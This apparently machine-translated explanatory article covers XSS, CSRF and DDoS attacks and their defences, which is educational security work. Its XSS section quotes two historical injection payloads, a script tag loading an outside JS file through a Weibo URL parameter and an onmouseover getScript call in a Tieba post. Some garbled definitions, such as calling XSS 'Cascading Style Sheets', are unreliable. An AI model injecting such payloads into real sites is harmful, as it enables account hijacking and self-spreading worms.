Common WEB attacks

Foreword: Before bitcoin can be described as all the limelight, the big fry money institutions, miners, emerge in endlessly. One day when I went to work, I opened the online web page, and the loading was extremely slow. Therefore, I found that the server occupancy rate exceeded 90% and further checked. It turned out that the web page was implanted with a mining code…

Hence the first stage of this article

XSS attacks

Cascading Style Sheets (CSS). XSS is a computer security vulnerability in Web applications. It allows malicious Web users to embed code into pages that are intended for use by other users.

Two well-known domestic examples. Just for example, please do not imitate, and this article is not relevant.

Sina Weibo XSS incident

1. Through the analysis of Sina Weibo, hackers found that sina Hall of Fame’s lax code filtering led to the existence of XSS vulnerability, and malicious codes could be implanted by constructing scripts.
2. Through analysis found in the Sina Hall of Fame section, when submittedhttp://weibo.com/pub/star/g/xyyyd"><script src=//www.2kt.cn/images/t.js></script>?type=updateUrl, Sina will process the string to become similarhttp://weibo.com/pub/star.php?g=xyyyd"><script src=//www.2kt.cn/images/t.js></script>?type=updateThe url.
3. The application does not filter parameter G sufficiently and displays the parameter value directly on the page. The hacker took advantage of this and replaced entry G with their JS script. The JS script is a hacker can control file, allows hackers to construct any JS script embedded in the page of weibo.com, and fully realize the function of the asynchronous data is submitted through Ajax technology, then hackers by constructing specific JS code to achieve the customer by this XSS attacks worm automatic tweeting, add attention and send direct messages and other operations.
4. Then hackers in order to make the XSS worms code can be a wide range of spread of infection, will pass to send direct messages or tweeting lure users to click the link existing cross-site code, especially for V standard authentication of users, because such a user has a large number of followers, so if the user poisoning, inevitably can realize a wide range of worms, spread rapidly.

Baidu Tieba XSS incident

1. Through the analysis of Tieba, hackers found that tieba was not strict in filtering certain places, which led to the existence of XSS vulnerabilities, and could implant malicious codes by constructing scripts.
2. Through analysis, it is found that in the share/repost function of a certain place in tiebar, because a div in the repost part is not sufficiently filtered, it can be directly displayed in the list of posts. Hackers take advantage of this, and implant code in div with OnMouseover.
3. The specific form of expression is to send a post, the post title isxxx“The post reads"style="height:100%; width:100%; position:fixed "onmouseover="$.getScript(\u0027//http://baid.ws/c8tf\u0027), as long as the user moves the mouse, will be infected immediately, and then similar posts issued to the cycle.

XSS attack type

1. One type is reflective XSS, also known as non-persistent XSS. When a victim is tricked into clicking on a malicious link and submitting a forged form, the malicious code is sent to the victim’s browser as a response along with the normal return data, fooling the browser into thinking that the malicious script came from a trusted server and allowing the malicious script to execute.
2. One type is storage XSS, also known as persistent XSS. The injected script lives permanently on the target server, reawakening the attack script every time the victim requests this data from the server.
3. One is DOM XSS, which is somewhat similar to storage XSS. Stored XSS, however, stores malicious scripts as data on the server, exposing every user who invokes the data. DOM XSS, however, is a local behavior that is more likely to result in malicious script execution when the DOM is updated locally.

The two examples above are the result of the second type of attack, which is extremely harmful.

XSS defenses

1. Special character filtering

< script > < script > < style > < / style > a, href | events, img SRC | events style =""
Copy the code

2. The introduction of CSP

• Content Security Policy is essentially a whitelist system, in which developers clearly tell clients which external resources can be loaded and executed, greatly enhancing the Security of web pages.

3. XSS and React

• By default, React DOM escapes any values embedded in JSX before rendering them. Thus it ensures that you can never inject anything That’s not explicitly written in your application. Everything is in line to a string before being rendered. This helps prevent XSS (cross-site-scripting) attacks.
• That is, the React DOM filters all incoming values by default before rendering. It ensures that your application will not be attacked by injection. All content is converted to a string before rendering. This effectively protects against XSS(cross-site scripting) attacks.
• However, React has a function called dangerouslySetInnerHTML that replaces the innerHTML interface in the BROWSER DOM. Use this function with care and should escape the relevant inserts to protect against XSS attacks.

---

CSRF attacks

Cross-site Request Forgery (CSRF), also known as One Click Attack or Session Riding, is a malicious exploitation of a website. Although it sounds like cross-site scripting (XSS), it is very different from XSS, which exploits trusted users within a site, whereas CSRF exploits trusted sites by masquerading requests from trusted users.

• Compared to XSS attacks, CSRF attacks tend to be less popular (and therefore have relatively few resources to defend against them) and harder to defend against, so they are considered more dangerous than XSS attacks.
• Attack main process
  1. Browser login and access site A;
  2. Authentication is successful, cookies are generated, and a callback is created.
  3. The attacker constructs the malicious web address, the user accesses the malicious address;
  4. The attacker obtains the victim’s Cookie and visits website A.
  5. The attacker succeeds in logging in to USER A.
• Attack focus
  1. CSRF attacks are created during a session between the browser and the Web server
  2. Tricking the user into accessing the URL

A simple example describes CSRF attacks

As you all know, payment scanning is very popular nowadays.

1. If there is an old woman A ready to take to the streets to set up stalls, after the beginning, all the process of collecting money, are face to face transactions. When there are many people, it is difficult to find money. One day, a young man offered to pay with XX. Then after a meal of explanation and operation, aunt learned to collect money by mobile payment. She found it so convenient that she didn’t have to dig into her pocket to get change.
2. When there were more people, she repeatedly took out her mobile phone, which made her very upset. The vendor beside her told her that she could print out the payment code. After she tried it, she found it more convenient.
3. One day, when the old woman was not looking, a wicked man changed the payment code into his. So there is a kind of old woman present, but unaware of the situation, a lot of less money.
4. CSRF is more or less like that, where you go to site A and there’s A tip function. Every time you finish reading an article, give someone a tip. One day, a link popped up saying ‘test your love life’, and after a bit of curiosity, the page flickered and then stopped responding. You continue to read the article, click on the tip, prompt insufficient balance…
5. Since there are few examples of CSRF, a very simple example is given to help you understand the attack mode of CSRF more directly.

CSRF defense

• Client:
  • Anything that involves privacy, plus a captcha
  • When the form is submitted, a bidirectional binding value is added, which is requested from the server as a true seed. And then we use an algorithm to calculate it, and only if you enter it manually, can you trigger this value, and when you submit the form, you submit it together. Or request a token from the server and submit it together when the form is submitted, but this method is cumbersome.
• Server:
  • Verify the HTTP Referer field, also known as the Referer Check, which is most commonly used on the Web for preventing image theft.
    1. In the same way, the Referer Check can be used to Check whether the request is coming from a legitimate “source” (whether the Referer value is the specified page, or the domain of the site), and if neither is, it is most likely a CSRF attack.
    2. However, this approach is not foolproof. The value of the Referer is provided by the browser. Although there are clear requirements on the HTTP protocol, the specific implementation of the Referer by each browser may be different, and there is no guarantee that the browser itself is free of security vulnerabilities. The method of verifying the Referer value relies on the security of a third party (i.e. the browser), which in theory is not secure.
  • Change a GET request to a POST request, but this is not foolproof.
  • Customize the attributes and validate them in the HTTP header, but this approach is very limited. XMLHttpRequest is usually used for asynchronous partial page refresh in Ajax methods. Not all requests are suitable to be initiated with this class, and the page obtained through this class cannot be recorded by the browser, thus making it inconvenient for users to move forward, backward, refresh, and save.

---

DDOS attack

Distributed Denial of Service (DDOS) attacks are Distributed Denial of Service (DDOS) attacks.

1. It occupies a large number of network resources mainly through a large number of legitimate requests, so that legitimate users cannot get the response of the service, which is one of the most powerful and difficult to defend.
2. DDoS attacks can target various layers of network communication protocols, including SYN Flood and ACK Flood of TCP, Fraggle and Trinoo of UDP, DNS Query Flood, ICMP Flood, and Slowloris.
3. Usually, before the attack, the attacker will control a large number of user computers in advance, called “chicken”, and make a large number of chicken access to a host at the same time through instructions, so as to achieve the purpose of paralyzing the target host.
4. The biggest difficulty in defending against ddos attacks is that the cost of the attacks launched by the attacker is much lower than the cost of defending against ddos attacks. For example, hackers can easily control a large number of chickens to launch a 10G, 100G attack. And to defend against this attack, 10GB, 100GB bandwidth costs 100W, 1000W… .

SYN Flood

1. The client sends a request to establish a connection. Then the server returns a message indicating that the request has been accepted. Then the client returns a message indicating that the request has been accepted.
2. So if there is such a situation, the attacker forged IP address, send a message to the server request connection, the server accepts this time, according to the rules of the TCP three-way handshake, the server will respond to a message, but this IP is fake, who respond to the message, the second handshake errors, the third time nature also can’t go smoothly, In this case, the server fails to receive the packet sent by the client during the third handshake and repeats the second handshake.
3. If an attacker forges a large number of IP addresses and makes requests, the server will maintain a very large half-connection wait list, consuming a lot of resources, and eventually the server will crash.

ACK Flood

1. After a TCP connection is established, all of the data transmission performance is a TCP packet with the ACK flag, the host received a packet with the ACK flag bit, need to check whether the packets represented by connecting the quad, if present, check the status of the packet represents whether legitimate, and then to give the packet to the application layer.
2. If the packet is found to be invalid, for example, the port to which the packet is destined is not enabled on the host, the protocol stack of the host operating system responds to the RST packet to inform the peer that the port does not exist. Typically, a stateful firewall does something similar, except that the firewall only intercepts illegal packets and does not actively respond.
3. When the packet sending rate is high, the host operating system spends a lot of energy to receive packets, determine the status, and proactively respond to RST packets. Therefore, normal packets may not be processed in a timely manner.

DNS Query Flood

1. The UDP DNS Query Flood attack sends a large number of domain name resolution requests to the attacked server. Usually, the requested domain names are randomly generated or non-existent on the network.
2. When receiving a domain name resolution request, the attacked DNS server first checks whether the cache exists on the server. If the cache cannot be found and the domain name cannot be resolved by the server, the DNS server recursively queries the domain name information from the upper-layer DNS server.
3. Domain name resolution brings heavy load to the server. If the number of domain name resolution requests exceeds a certain threshold every second, the DNS server times out when resolving domain names.

ICMP flood

1. ICMP FLOOD is a DDOS attack that sends packets of more than 65535 bytes to the target host. If a large number of packets are sent, it becomes a FLOOD attack.
2. ICMP is an Internet Control Message Protocol (ICMP). As a subprotocol of TCP/IP, it is used to transfer control messages between IP hosts and routers. Control messages refer to the messages about the network itself, such as whether the network is connected, whether the host is reachable, and whether the route is available. Although these control messages do not transmit user data, they play an important role in the transmission of user data.

CC attack

1. Challenge Collapsar (CC) attack is an application-layer HTTP attack, also known as HTTP Flood.
2. Attackers use a large number of controlled “chickens” or a large number of anonymous HTTP proxies searched from the Internet to simulate normal users making requests to a site until the site refuses service.
3. Most websites use CDN and distributed cache to speed up the response of the server and improve the throughput of the website. However, these carefully constructed HTTP requests often deliberately avoid these caches, requiring multiple DB query operations or one request to return a large amount of data to speed up the system Resource consumption, dragging down back-end business processing systems, and even associated storage and log collection systems.

DDOS defense

1. Mainly lies in the hardware, the host, the server system, here will not elaborate (mainly is not quite understand…) .
2. Alibaba’s security team found in actual combat that the core of DDoS defense products is detection technology and cleaning technology.

Read more: GitHub suffers peak DDOS attack

---

There are many attack modes that are not mentioned here, such as XXE,SQLI, etc. This article only plays a brick role here, each part can be studied in depth for a long time, just hope that we can arouse attention to WEB security.

This is a comparison of images from 13 to 17 from OWASP Update comparison

• Overview of TOP10 WEB attacks in 2017
• 2017 TOP10 WEB attacks to read